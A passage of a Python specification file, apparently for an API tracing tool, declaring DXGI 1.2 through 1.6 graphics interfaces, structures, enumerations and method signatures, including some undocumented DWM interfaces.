DXGI_SHARED_RESOURCE_FLAG = Flags(DWORD, [
"DXGI_SHARED_RESOURCE_READ",
"DXGI_SHARED_RESOURCE_WRITE",
])
IDXGIResource1 = Interface("IDXGIResource1", IDXGIResource)
IDXGIResource1.methods += [
StdMethod(HRESULT, "CreateSubresourceSurface", [(UINT, "index"), Out(Pointer(ObjPointer(IDXGISurface2)), "ppSurface")]),
StdMethod(HRESULT, "CreateSharedHandle", [(Pointer(Const(SECURITY_ATTRIBUTES)), "pAttributes"), (DXGI_SHARED_RESOURCE_FLAG, "dwAccess"), (LPCWSTR, "lpName"), Out(Pointer(HANDLE), "pHandle")]),
]
DXGI_OFFER_RESOURCE_PRIORITY = Enum("DXGI_OFFER_RESOURCE_PRIORITY", [
"DXGI_OFFER_RESOURCE_PRIORITY_LOW",
"DXGI_OFFER_RESOURCE_PRIORITY_NORMAL",
"DXGI_OFFER_RESOURCE_PRIORITY_HIGH",
])
IDXGIDevice2 = Interface("IDXGIDevice2", IDXGIDevice1)
IDXGIDevice2.methods += [
StdMethod(HRESULT, "OfferResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), (DXGI_OFFER_RESOURCE_PRIORITY, "Priority")]),
StdMethod(HRESULT, "ReclaimResources", [(UINT, "NumResources"), (Array(Const(ObjPointer(IDXGIResource)), "NumResources"), "ppResources"), Out(Pointer(BOOL), "pDiscarded")]),
StdMethod(HRESULT, "EnqueueSetEvent", [(HANDLE, "hEvent")], sideeffects=False),
]
DXGI_MODE_DESC1 = Struct("DXGI_MODE_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Stereo"),
])
DXGI_SCALING = Enum("DXGI_SCALING", [
"DXGI_SCALING_STRETCH",
"DXGI_SCALING_NONE",
"DXGI_SCALING_ASPECT_RATIO_STRETCH",
])
DXGI_SWAP_CHAIN_DESC1 = Struct("DXGI_SWAP_CHAIN_DESC1", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(BOOL, "Stereo"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(DXGI_SCALING, "Scaling"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_ALPHA_MODE, "AlphaMode"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_SWAP_CHAIN_FULLSCREEN_DESC = Struct("DXGI_SWAP_CHAIN_FULLSCREEN_DESC", [
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
(BOOL, "Windowed"),
])
DXGI_PRESENT_PARAMETERS = Struct("DXGI_PRESENT_PARAMETERS", [
(UINT, "DirtyRectsCount"),
(Array(RECT, "{self}.DirtyRectsCount"), "pDirtyRects"),
(Pointer(RECT), "pScrollRect"),
(Pointer(POINT), "pScrollOffset"),
])
IDXGISwapChain1 = Interface("IDXGISwapChain1", IDXGISwapChain)
IDXGISwapChain1.methods += [
StdMethod(HRESULT, "GetDesc1", [(Out(Pointer(DXGI_SWAP_CHAIN_DESC1), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetFullscreenDesc", [(Out(Pointer(DXGI_SWAP_CHAIN_FULLSCREEN_DESC), "pDesc"))], sideeffects=False),
StdMethod(HRESULT, "GetHwnd", [(Out(Pointer(HWND), "pHwnd"))], sideeffects=False),
StdMethod(HRESULT, "GetCoreWindow", [(REFIID, "riid"), (Out(Pointer(ObjPointer(Void)), "ppUnk"))]),
StdMethod(HRESULT, "Present1", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags"), (Pointer(Const(DXGI_PRESENT_PARAMETERS)), "pPresentParameters")]),
StdMethod(BOOL, "IsTemporaryMonoSupported", [], sideeffects=False),
StdMethod(HRESULT, "GetRestrictToOutput", [(Out(Pointer(ObjPointer(IDXGIOutput)), "ppRestrictToOutput"))]),
StdMethod(HRESULT, "SetBackgroundColor", [(Pointer(Const(DXGI_RGBA)), "pColor")]),
StdMethod(HRESULT, "GetBackgroundColor", [(Out(Pointer(DXGI_RGBA), "pColor"))], sideeffects=False),
StdMethod(HRESULT, "SetRotation", [(DXGI_MODE_ROTATION, "Rotation")]),
StdMethod(HRESULT, "GetRotation", [(Out(Pointer(DXGI_MODE_ROTATION), "pRotation"))], sideeffects=False),
]
IDXGIFactory2 = Interface("IDXGIFactory2", IDXGIFactory1)
IDXGIFactory2.methods += [
StdMethod(BOOL, "IsWindowedStereoEnabled", [], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForHwnd", [(ObjPointer(IUnknown), "pDevice"), (HWND, "hWnd"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (Pointer(Const(DXGI_SWAP_CHAIN_FULLSCREEN_DESC)), "pFullscreenDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSwapChainForCoreWindow", [(ObjPointer(IUnknown), "pDevice"), (ObjPointer(IUnknown), "pWindow"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "GetSharedResourceAdapterLuid", [(HANDLE, "hResource"), Out(Pointer(LUID), "pLuid")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterStereoStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterStereoStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusWindow", [(HWND, "WindowHandle"), (UINT, "wMsg"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(HRESULT, "RegisterOcclusionStatusEvent", [(HANDLE, "hEvent"), Out(Pointer(DWORD), "pdwCookie")], sideeffects=False),
StdMethod(Void, "UnregisterOcclusionStatus", [(DWORD, "dwCookie")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChainForComposition", [(ObjPointer(IUnknown), "pDevice"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
]
DXGI_GRAPHICS_PREEMPTION_GRANULARITY = Enum("DXGI_GRAPHICS_PREEMPTION_GRANULARITY", [
"DXGI_GRAPHICS_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PRIMITIVE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_TRIANGLE_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_PIXEL_BOUNDARY",
"DXGI_GRAPHICS_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_COMPUTE_PREEMPTION_GRANULARITY = Enum("DXGI_COMPUTE_PREEMPTION_GRANULARITY", [
"DXGI_COMPUTE_PREEMPTION_DMA_BUFFER_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_DISPATCH_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_GROUP_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_THREAD_BOUNDARY",
"DXGI_COMPUTE_PREEMPTION_INSTRUCTION_BOUNDARY",
])
DXGI_ADAPTER_DESC2 = Struct("DXGI_ADAPTER_DESC2", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_ADAPTER_FLAG, "Flags"),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, "GraphicsPreemptionGranularity"),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, "ComputePreemptionGranularity"),
])
IDXGIAdapter2 = Interface("IDXGIAdapter2", IDXGIAdapter1)
IDXGIAdapter2.methods += [
StdMethod(HRESULT, "GetDesc2", [Out(Pointer(DXGI_ADAPTER_DESC2), "pDesc")], sideeffects=False),
]
IDXGIOutput1 = Interface("IDXGIOutput1", IDXGIOutput)
IDXGIOutput1.methods += [
StdMethod(HRESULT, "GetDisplayModeList1", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC1, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode1", [(Pointer(Const(DXGI_MODE_DESC1)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC1), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "GetDisplaySurfaceData1", [(ObjPointer(IDXGIResource), "pDestination")]),
StdMethod(HRESULT, "DuplicateOutput", [(ObjPointer(IUnknown), "pDevice"), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), "ppOutputDuplication")]),
]
dxgi.addInterfaces([
IDXGIDisplayControl,
IDXGIDevice2,
IDXGISwapChain1,
IDXGIFactory2,
IDXGIResource1,
IDXGIAdapter2,
IDXGIOutput1,
])
#
# DXGI 1.3
#
DXGI_CREATE_FACTORY_FLAGS = Flags(UINT, [
"DXGI_CREATE_FACTORY_DEBUG",
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory2", [(DXGI_CREATE_FACTORY_FLAGS, "Flags"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
])
IDXGIDevice3 = Interface("IDXGIDevice3", IDXGIDevice2)
IDXGIDevice3.methods += [
StdMethod(Void, "Trim", []),
]
DXGI_MATRIX_3X2_F = Struct("DXGI_MATRIX_3X2_F", [
(FLOAT, "_11"),
(FLOAT, "_12"),
(FLOAT, "_21"),
(FLOAT, "_22"),
(FLOAT, "_31"),
(FLOAT, "_32"),
])
IDXGISwapChain2 = Interface("IDXGISwapChain2", IDXGISwapChain1)
IDXGISwapChain2.methods += [
StdMethod(HRESULT, "SetSourceSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
StdMethod(HANDLE, "GetFrameLatencyWaitableObject", [], sideeffects=False),
StdMethod(HRESULT, "SetMatrixTransform", [(Pointer(Const(DXGI_MATRIX_3X2_F)), "pMatrix")]),
StdMethod(HRESULT, "GetMatrixTransform", [Out(Pointer(DXGI_MATRIX_3X2_F), "pMatrix")], sideeffects=False),
]
IDXGIOutput2 = Interface("IDXGIOutput2", IDXGIOutput1)
IDXGIOutput2.methods += [
StdMethod(BOOL, "SupportsOverlays", [], sideeffects=False),
]
IDXGIFactory3 = Interface("IDXGIFactory3", IDXGIFactory2)
IDXGIFactory3.methods += [
StdMethod(DXGI_CREATE_FACTORY_FLAGS, "GetCreationFlags", [], sideeffects=False),
]
DXGI_DECODE_SWAP_CHAIN_DESC = Struct("DXGI_DECODE_SWAP_CHAIN_DESC", [
(UINT, "Flags"),
])
# XXX: Flags
DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS = Enum("DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS", [
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_NOMINAL_RANGE",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_BT709",
"DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAG_xvYCC",
])
IDXGIDecodeSwapChain = Interface("IDXGIDecodeSwapChain", IUnknown)
IDXGIDecodeSwapChain.methods += [
StdMethod(HRESULT, "PresentBuffer", [(UINT, "BufferToPresent"), (UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "SetSourceRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetTargetRect", [(Pointer(Const(RECT)), "pRect")]),
StdMethod(HRESULT, "SetDestSize", [(UINT, "Width"), (UINT, "Height")]),
StdMethod(HRESULT, "GetSourceRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetTargetRect", [Out(Pointer(RECT), "pRect")], sideeffects=False),
StdMethod(HRESULT, "GetDestSize", [Out(Pointer(UINT), "pWidth"), Out(Pointer(UINT), "pHeight")], sideeffects=False),
StdMethod(HRESULT, "SetColorSpace", [(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "ColorSpace")]),
StdMethod(DXGI_MULTIPLANE_OVERLAY_YCbCr_FLAGS, "GetColorSpace", [], sideeffects=False),
]
IDXGIFactoryMedia = Interface("IDXGIFactoryMedia", IUnknown)
IDXGIFactoryMedia.methods += [
StdMethod(HRESULT, "CreateSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(Const(DXGI_SWAP_CHAIN_DESC1)), "pDesc"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGISwapChain1)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateDecodeSwapChainForCompositionSurfaceHandle", [(ObjPointer(IUnknown), "pDevice"), (HANDLE, "hSurface"), (Pointer(DXGI_DECODE_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIResource), "pYuvDecodeBuffers"), (ObjPointer(IDXGIOutput), "pRestrictToOutput"), Out(Pointer(ObjPointer(IDXGIDecodeSwapChain)), "ppSwapChain")]),
]
DXGI_FRAME_PRESENTATION_MODE = Enum("DXGI_FRAME_PRESENTATION_MODE", [
"DXGI_FRAME_PRESENTATION_MODE_COMPOSED",
"DXGI_FRAME_PRESENTATION_MODE_OVERLAY",
"DXGI_FRAME_PRESENTATION_MODE_NONE",
])
DXGI_FRAME_STATISTICS_MEDIA = Struct("DXGI_FRAME_STATISTICS_MEDIA", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
(DXGI_FRAME_PRESENTATION_MODE, "CompositionMode"),
(UINT, "ApprovedPresentDuration"),
])
IDXGISwapChainMedia = Interface("IDXGISwapChainMedia", IUnknown)
IDXGISwapChainMedia.methods += [
StdMethod(HRESULT, "GetFrameStatisticsMedia", [Out(Pointer(DXGI_FRAME_STATISTICS_MEDIA), "pStats")], sideeffects=False),
StdMethod(HRESULT, "SetPresentDuration", [(UINT, "Duration")]),
StdMethod(HRESULT, "CheckPresentDurationSupport", [(UINT, "DesiredPresentDuration"), Out(Pointer(UINT), "pClosestSmallerPresentDuration"), Out(Pointer(UINT), "pClosestLargerPresentDuration")], sideeffects=False),
]
DXGI_OVERLAY_SUPPORT_FLAG = FakeEnum(UINT, [
"DXGI_OVERLAY_SUPPORT_FLAG_DIRECT",
"DXGI_OVERLAY_SUPPORT_FLAG_SCALING",
])
IDXGIOutput3 = Interface("IDXGIOutput3", IDXGIOutput2)
IDXGIOutput3.methods += [
StdMethod(HRESULT, "CheckOverlaySupport", [(DXGI_FORMAT, "EnumFormat"), (ObjPointer(IUnknown), "pConcernedDevice"), Out(Pointer(DXGI_OVERLAY_SUPPORT_FLAG), "pFlags")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIDevice3,
IDXGISwapChain2,
IDXGISwapChainMedia,
IDXGIOutput3,
IDXGIFactory3,
IDXGIFactoryMedia,
])
#
# Undocumented interfaces
#
IDXGIFactoryDWM = Interface("IDXGIFactoryDWM", IUnknown)
IDXGISwapChainDWM = Interface("IDXGISwapChainDWM", IDXGIDeviceSubObject)
IDXGIFactoryDWM.methods += [
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), (ObjPointer(IDXGIOutput), "pOutput"), Out(Pointer(ObjPointer(IDXGISwapChainDWM)), "ppSwapChain")]),
]
# http://shchetinin.blogspot.co.uk/2012/04/dwm-graphics-directx-win8win7.html
IDXGISwapChainDWM.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIFactoryDWM,
])
#
# DXGI 1.4
#
DXGI_COLOR_SPACE_TYPE = Enum('DXGI_COLOR_SPACE_TYPE', [
'DXGI_COLOR_SPACE_RGB_FULL_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_FULL_G10_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P709',
'DXGI_COLOR_SPACE_RGB_STUDIO_G22_NONE_P2020',
'DXGI_COLOR_SPACE_RESERVED',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_NONE_P709_X601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P601',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P709',
'DXGI_COLOR_SPACE_YCBCR_STUDIO_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_YCBCR_FULL_G22_LEFT_P2020',
'DXGI_COLOR_SPACE_CUSTOM',
])
DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
'DXGI_SWAP_CHAIN_COLOR_SPACE_SUPPORT_FLAG_OVERLAY_PRESENT',
])
DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG = Enum('DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG', [
'DXGI_OVERLAY_COLOR_SPACE_SUPPORT_FLAG_PRESENT',
])
DXGI_MEMORY_SEGMENT_GROUP = Enum('DXGI_MEMORY_SEGMENT_GROUP', [
'DXGI_MEMORY_SEGMENT_GROUP_LOCAL',
'DXGI_MEMORY_SEGMENT_GROUP_NON_LOCAL',
])
DXGI_QUERY_VIDEO_MEMORY_INFO = Struct('DXGI_QUERY_VIDEO_MEMORY_INFO', [
(UINT64, 'Budget'),
(UINT64, 'CurrentUsage'),
(UINT64, 'AvailableForReservation'),
(UINT64, 'CurrentReservation'),
])
IDXGISwapChain3 = Interface('IDXGISwapChain3', IDXGISwapChain2)
IDXGIOutput4 = Interface('IDXGIOutput4', IDXGIOutput3)
IDXGIFactory4 = Interface('IDXGIFactory4', IDXGIFactory3)
IDXGIAdapter3 = Interface('IDXGIAdapter3', IDXGIAdapter2)
IDXGISwapChain3.methods += [
StdMethod(UINT, 'GetCurrentBackBufferIndex', []),
StdMethod(HRESULT, 'CheckColorSpaceSupport', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), Out(Pointer(UINT), 'pColorSpaceSupport')], sideeffects=False),
StdMethod(HRESULT, 'SetColorSpace1', [(DXGI_COLOR_SPACE_TYPE, 'ColorSpace')]),
StdMethod(HRESULT, 'ResizeBuffers1', [(UINT, 'BufferCount'), (UINT, 'Width'), (UINT, 'Height'), (DXGI_FORMAT, 'Format'), (DXGI_SWAP_CHAIN_FLAG, 'SwapChainFlags'), (Pointer(Const(UINT)), 'pCreationNodeMask'), (Array(Const(ObjPointer(IUnknown)), 'BufferCount'), 'ppPresentQueue')]),
]
IDXGIOutput4.methods += [
StdMethod(HRESULT, 'CheckOverlayColorSpaceSupport', [(DXGI_FORMAT, 'Format'), (DXGI_COLOR_SPACE_TYPE, 'ColorSpace'), (ObjPointer(IUnknown), 'pConcernedDevice'), Out(Pointer(UINT), 'pFlags')], sideeffects=False),
]
IDXGIFactory4.methods += [
StdMethod(HRESULT, 'EnumAdapterByLuid', [(LUID, 'AdapterLuid'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
StdMethod(HRESULT, 'EnumWarpAdapter', [(REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
IDXGIAdapter3.methods += [
StdMethod(HRESULT, 'RegisterHardwareContentProtectionTeardownStatusEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterHardwareContentProtectionTeardownStatus', [(DWORD, 'dwCookie')], sideeffects=False),
StdMethod(HRESULT, 'QueryVideoMemoryInfo', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), Out(Pointer(DXGI_QUERY_VIDEO_MEMORY_INFO), 'pVideoMemoryInfo')], sideeffects=False),
StdMethod(HRESULT, 'SetVideoMemoryReservation', [(UINT, 'NodeIndex'), (DXGI_MEMORY_SEGMENT_GROUP, 'MemorySegmentGroup'), (UINT64, 'Reservation')]),
StdMethod(HRESULT, 'RegisterVideoMemoryBudgetChangeNotificationEvent', [(HANDLE, 'hEvent'), Out(Pointer(DWORD), 'pdwCookie')], sideeffects=False),
StdMethod(Void, 'UnregisterVideoMemoryBudgetChangeNotification', [(DWORD, 'dwCookie')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGISwapChain3,
IDXGIOutput4,
IDXGIFactory4,
IDXGIAdapter3,
])
#
# DXGI 1.5
#
DXGI_HDR_METADATA_TYPE = Enum('DXGI_HDR_METADATA_TYPE', [
'DXGI_HDR_METADATA_TYPE_NONE',
'DXGI_HDR_METADATA_TYPE_HDR10',
])
DXGI_HDR_METADATA_HDR10 = Struct('DXGI_HDR_METADATA_HDR10', [
(Array(UINT16, 2), 'RedPrimary'),
(Array(UINT16, 2), 'GreenPrimary'),
(Array(UINT16, 2), 'BluePrimary'),
(Array(UINT16, 2), 'WhitePoint'),
(UINT, 'MaxMasteringLuminance'),
(UINT, 'MinMasteringLuminance'),
(UINT16, 'MaxContentLightLevel'),
(UINT16, 'MaxFrameAverageLightLevel'),
])
DXGI_OFFER_RESOURCE_FLAGS = FakeEnum(UINT, [
'DXGI_OFFER_RESOURCE_FLAG_ALLOW_DECOMMIT',
])
DXGI_RECLAIM_RESOURCE_RESULTS = Enum('DXGI_RECLAIM_RESOURCE_RESULTS', [
'DXGI_RECLAIM_RESOURCE_RESULT_OK',
'DXGI_RECLAIM_RESOURCE_RESULT_DISCARDED',
'DXGI_RECLAIM_RESOURCE_RESULT_NOT_COMMITTED',
])
DXGI_FEATURE, DXGI_FEATURE_DATA = EnumPolymorphic('DXGI_FEATURE', 'Feature', [
('DXGI_FEATURE_PRESENT_ALLOW_TEARING', Pointer(BOOL)),
], Blob(Void, "FeatureSupportDataSize"), False)
IDXGIOutput5 = Interface('IDXGIOutput5', IDXGIOutput4)
IDXGISwapChain4 = Interface('IDXGISwapChain4', IDXGISwapChain3)
IDXGIDevice4 = Interface('IDXGIDevice4', IDXGIDevice3)
IDXGIFactory5 = Interface('IDXGIFactory5', IDXGIFactory4)
IDXGIOutput5.methods += [
StdMethod(HRESULT, 'DuplicateOutput1', [(ObjPointer(IUnknown), 'pDevice'), (UINT, 'Flags'), (UINT, 'SupportedFormatsCount'), (Array(Const(DXGI_FORMAT), 'SupportedFormatsCount'), 'pSupportedFormats'), Out(Pointer(ObjPointer(IDXGIOutputDuplication)), 'ppOutputDuplication')]),
]
IDXGISwapChain4.methods += [
StdMethod(HRESULT, 'SetHDRMetaData', [(DXGI_HDR_METADATA_TYPE, 'Type'), (UINT, 'Size'), (Blob(Void, 'Size'), 'pMetaData')]),
]
IDXGIDevice4.methods += [
StdMethod(HRESULT, 'OfferResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), (DXGI_OFFER_RESOURCE_PRIORITY, 'Priority'), (DXGI_OFFER_RESOURCE_FLAGS, 'Flags')]),
StdMethod(HRESULT, 'ReclaimResources1', [(UINT, 'NumResources'), (Array(Const(ObjPointer(IDXGIResource)), 'NumResources'), 'ppResources'), Out(Array(DXGI_RECLAIM_RESOURCE_RESULTS, 'NumResources'), 'pResults')]),
]
IDXGIFactory5.methods += [
StdMethod(HRESULT, 'CheckFeatureSupport', [(DXGI_FEATURE, 'Feature'), Out(DXGI_FEATURE_DATA, 'pFeatureSupportData'), (UINT, 'FeatureSupportDataSize')], sideeffects=False),
]
dxgi.addInterfaces([
IDXGIOutput5,
IDXGISwapChain4,
IDXGIDevice4,
IDXGIFactory5,
])
#
# DXGI 1.6
#
DXGI_ADAPTER_FLAG3 = Enum('DXGI_ADAPTER_FLAG3', [
'DXGI_ADAPTER_FLAG3_NONE',
'DXGI_ADAPTER_FLAG3_REMOTE',
'DXGI_ADAPTER_FLAG3_SOFTWARE',
'DXGI_ADAPTER_FLAG3_ACG_COMPATIBLE',
'DXGI_ADAPTER_FLAG3_FORCE_DWORD',
'DXGI_ADAPTER_FLAG3_SUPPORT_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_SUPPORT_NON_MONITORED_FENCES',
'DXGI_ADAPTER_FLAG3_KEYED_MUTEX_CONFORMANCE',
])
DXGI_ADAPTER_DESC3 = Struct('DXGI_ADAPTER_DESC3', [
(WString, 'Description'),
(UINT, 'VendorId'),
(UINT, 'DeviceId'),
(UINT, 'SubSysId'),
(UINT, 'Revision'),
(SIZE_T, 'DedicatedVideoMemory'),
(SIZE_T, 'DedicatedSystemMemory'),
(SIZE_T, 'SharedSystemMemory'),
(LUID, 'AdapterLuid'),
(DXGI_ADAPTER_FLAG3, 'Flags'),
(DXGI_GRAPHICS_PREEMPTION_GRANULARITY, 'GraphicsPreemptionGranularity'),
(DXGI_COMPUTE_PREEMPTION_GRANULARITY, 'ComputePreemptionGranularity'),
])
DXGI_OUTPUT_DESC1 = Struct('DXGI_OUTPUT_DESC1', [
(WString, 'DeviceName'),
(RECT, 'DesktopCoordinates'),
(BOOL, 'AttachedToDesktop'),
(DXGI_MODE_ROTATION, 'Rotation'),
(HMONITOR, 'Monitor'),
(UINT, 'BitsPerColor'),
(DXGI_COLOR_SPACE_TYPE, 'ColorSpace'),
(Array(FLOAT, 2), 'RedPrimary'),
(Array(FLOAT, 2), 'GreenPrimary'),
(Array(FLOAT, 2), 'BluePrimary'),
(Array(FLOAT, 2), 'WhitePoint'),
(FLOAT, 'MinLuminance'),
(FLOAT, 'MaxLuminance'),
(FLOAT, 'MaxFullFrameLuminance'),
])
DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS = Flags(UINT, [
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_FULLSCREEN',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_WINDOWED',
'DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAG_CURSOR_STRETCHED',
])
DXGI_GPU_PREFERENCE = Enum('DXGI_GPU_PREFERENCE', [
'DXGI_GPU_PREFERENCE_UNSPECIFIED',
'DXGI_GPU_PREFERENCE_MINIMUM_POWER',
'DXGI_GPU_PREFERENCE_HIGH_PERFORMANCE',
])
IDXGIFactory6 = Interface('IDXGIFactory6', IDXGIFactory5)
IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
